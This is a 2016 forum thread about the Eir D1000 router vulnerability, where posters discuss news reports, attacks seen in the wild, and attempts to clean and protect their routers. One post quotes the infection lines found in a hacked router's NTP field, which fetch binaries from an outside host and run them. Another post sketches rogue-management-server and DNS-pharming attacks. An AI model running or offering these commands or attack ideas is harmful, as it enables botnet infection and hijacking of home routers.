Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Eir home router vulnerability.

  • 22-11-2016 9:41am
    #1
    Registered Users, Registered Users 2 Posts: 246 ✭✭


    Looks like Eir have made a dog's dinner of the security on their D1000 modem.

    http://www.theregister.co.uk/2016/11/22/eir_customers_modems_vulnerable/
    The ZyXEL-built Eir D1000 comes with an open TCP port, 7547, which is used by the CPE WAN Management Protocol to manage the modems on Eir's network.
    "By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall," kenzo's post says. "This allows access to the web administration interface from the Internet-facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command."

    The Register seem to be the only source at the moment, Eir have declined to comment.

    Sleep soundly :)


Comments

  • Registered Users, Registered Users 2 Posts: 6,393 ✭✭✭AnCatDubh


    I recall something about another Eir(com) router - DSL grade (can't recall which model), which on the admin login page had the admin password embedded as a comment in the HTML(!!). I came across it on these forums and verified myself that this was the case as I had the same router. Though now I am no longer an Eir(com) customer (not specifically for that reason though).

    EDIT: Here's that thread that I was referring to. http://www.boards.ie/vbulletin/showthread.php?p=93275394


  • Registered Users, Registered Users 2 Posts: 1,003 ✭✭✭_Puma_


    Heads should roll for this. I've started a thread in the Talk to Eir section of boards.

    "Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable".


  • Posts: 11,614 ✭✭✭✭ [Deleted User]


    I saw this talk at DefCon 2 years ago and it described a different albeit similar protocol and pretty much the same vulnerability.



  • Registered Users, Registered Users 2 Posts: 126 ✭✭infodox


    Trivially exploitable remotely. Exploit Code/Screenshot
    You can do the config dumping and changing on Vodafone (Ireland), TalkTalk (UK), Plusnet (UK), Demon (UK), Post Office Broadband (UK) ones as well. Have yet to test it on the ZyXEL's that Zen Internet (UK) ship. So far the remote command injection has only worked in tests I was able to perform on Eir ones.


  • Registered Users, Registered Users 2 Posts: 246 ✭✭Alcoheda


    That's shocking, Do you think these routers are being attacked in the wild?
    I mean I could probably write a botnet with that information and I know basically nothing.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 126 ✭✭infodox


    They probably are being actively exploited (probably at a small scale) by now.
    More interestingly, while reading the TR-064 spec I noticed there is a config value you can set to change the ACS management server to one of your choice, lol.
    So instead of dropping malware on them in the "usual fashion", you could just set up your own ACS server (there are F/OSS packages out there for this) and mass-change the settings so they are now "managed" by you instead of the ISP.
    You could also engage in widespread "pharming" by remotely updating the DNS servers they use to ones under your control, and then proceed to redirect users to phishing pages instead of legitimate sites. This has been done before by exploiting CSRF bugs in routers and broken authentication issues.


  • Registered Users, Registered Users 2 Posts: 1,093 ✭✭✭KAGY


    This might be cuurrently exploited. I noticed that my NTP server field was set to run a line of script rather than an ip address.
    something like change to tmp wget from l.ocal.host (extra dot included) and change perms to 777


  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    Here a comment from the (German) Heise Forum, mentioning a majority of those attacks coming from EIRCOM.

    Here the article about the D1000 vulnarability.
    --
    For security reasons this reply was encrypted twice using ROT13.


  • Registered Users, Registered Users 2 Posts: 1,093 ✭✭✭KAGY


    OK, my D1000 is definitely hacked. NTP server IP is a wget to this file/script
    cd /var/tmp;cd /tmp;wget http://binpt.pw/1;chmod 777 1;busybox chmod 777 1;./1;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/2;chmod 777 2;busybox chmod 777 2;./2;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/3;chmod 777 3;busybox chmod 777 3;./3;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/4;chmod 777 4;busybox chmod 777 4;./4;rm -f ./*


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    Welcome to the wonderful and weird world of bot nets.
    --
    In a perfect world spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.


  • Registered Users, Registered Users 2 Posts: 1,093 ✭✭✭KAGY


    Does anyone know how I can stop this while I research a new router. I've performed a full factory reset, installed a clean ROM from eir and changed the v default ports on the v remote management tab. But it keeps getting hacked.

    Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.

    BTW I'm now with Vodafone so I'm not sure if I'll get any fix from eir

    Recommendations for router that can run open WRT or similar also appreciated :-)


  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    Wow,

    Most probably you are the only one on the whole EIR network, trying to get rid of the problem.

    I am with DigiWeb (using EIR's backbone) on a standard DSL line.

    Finally, DigiWeb blocked the relevant port to be reachable from the whole world. At the beginning of the attack the port was accessible. According to your post, EIR leaves their customers at risk allowing access for the world to those port through their network on to the customers' routers.

    I prefer BuffaloTech Airstations for setup with OpenWRT. I do not know which current models are compatible, just check the TOH.

    BuffaloTech also sells Airstations with pre-installed DD-WRT, if that suits you.

    Regards,
    Jörn.


  • Registered Users, Registered Users 2 Posts: 126 ✭✭infodox


    Finally published my writeup on the issue along with lengthy lists of impacted devices/vendors, and possible ways the issue could be exploited.
    Probably will add more later - still reversing the malware itself that is being installed on the devices.


  • Registered Users, Registered Users 2 Posts: 1,987 ✭✭✭Ziycon




  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    Interesting is
    • here, on boards.ie, up to now 16 messages in this thread
    versus
    • 352 messages (05.12.16, 21:00) on heise.de, where they discussed the results of this attack on the German Telekom network
    What did we learn from thes figures?

    <sacrcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>


  • Registered Users, Registered Users 2 Posts: 6,279 ✭✭✭TheRiverman


    The ZyXel modems are rubbish compared to the Netopia model that was used some years ago.


  • Registered Users, Registered Users 2 Posts: 71,107 ✭✭✭✭L1011


    jgorres wrote: »
    What did we learn from thes figures?

    <sacrcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>

    I'd take a stab that its more than technically minded people are more likely to have VDSL or cable than in Germany where lower speed DSL rules the roost. And its a smaller country.


  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    One point is that the vast majority of users aren't geeks. They simply want (and need) a box, which they plug into the socket the telco technician installed. Plug and play.

    The telcos deliver those boxes. Their approach is mainly based on the costs for those boxes, i.e. they need to be cheap. They take a crappy box, put some modified crippleware on it (company logo on admin interface is very important) and give them to their customers. Fire and forget.

    The point on the figures is not the absolute number. Over in Germany even the number of about 900,000 affected Telekom users (which from an Irish point of view is large) represents only a small portion of the overall Telekom broadband customers (13 millions, reference for this figure). Just 7 % of affected routers in the Telekom network made it coughing and rattling.

    And, according to EIR, just 1,800 routers were infected, but this small numbers caused those massive problems elsewhere (this is simplified, as not only EIRCOM is to blame and the Telekom routers have not been infected by the attack, but simply stopped working for another reason).

    I do not wish to fall back into history, where viruses were distributed via floppy disks and when you were king, when you had a 14,400 baud modem. However, it is a bit strange when one has to check the firewall because he changed a light bulb.

    At some point the so-called "smart" internet combined with the current security attitude will cause massive problems.


  • Registered Users, Registered Users 2 Posts: 1,987 ✭✭✭Ziycon


    I truly wonder who these companies hire sometimes!
    Speaking on RTÉ’s Morning Ireland, Eir’s director of communications Paul Bradley said that the company became aware of a potential security vulnerability after details surrounding the risks were posted on the internet.

    "It came to light because there was a post online," he said.

    http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 106 ✭✭jgorres


    Ziycon wrote: »
    I truly wonder who these companies hire sometimes!
    "It came to light because there was a post online," he said. http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/
    At least, they are not illiterate!


  • Closed Accounts Posts: 4,456 ✭✭✭The high horse brigade


    Ziycon wrote: »
    I truly wonder who these companies hire sometimes!



    http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/

    The person who found the vulnerability posted it online, nothing strange here


  • Registered Users, Registered Users 2 Posts: 1,093 ✭✭✭KAGY


    KAGY wrote: »
    Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.
    One of these seemed to work, until i next reboot anyway. Of course it could be Vodafone blocking the port.


  • Registered Users, Registered Users 2 Posts: 1,093 ✭✭✭KAGY


    KAGY wrote: »
    Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.
    One of these seemed to work, until i next reboot anyway. Of course it could be Vodafone blocking the port.


Advertisement